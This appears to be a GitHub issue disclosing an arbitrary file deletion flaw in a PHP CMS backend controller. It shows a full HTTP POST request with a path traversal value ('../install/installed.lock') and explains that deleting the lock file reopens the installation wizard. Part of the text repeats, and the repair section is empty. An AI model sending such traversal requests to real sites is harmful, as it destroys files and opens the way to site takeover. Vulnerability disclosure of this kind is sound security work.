You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file
Vulnerability to reproduce:
First log in to the background to get cookies。
Here I delete the installed.lock file to verify the existence of the vulnerability,construct the packet as follows:
Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file
Vulnerability to reproduce:
POST /index.php?m=backend&c=file&a=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
path[]=../install/installed.lock
3、Click Send Packet,you can see that the file was deleted successfully
4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page
Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page
Repair suggestion:
The text was updated successfully, but these errors were encountered: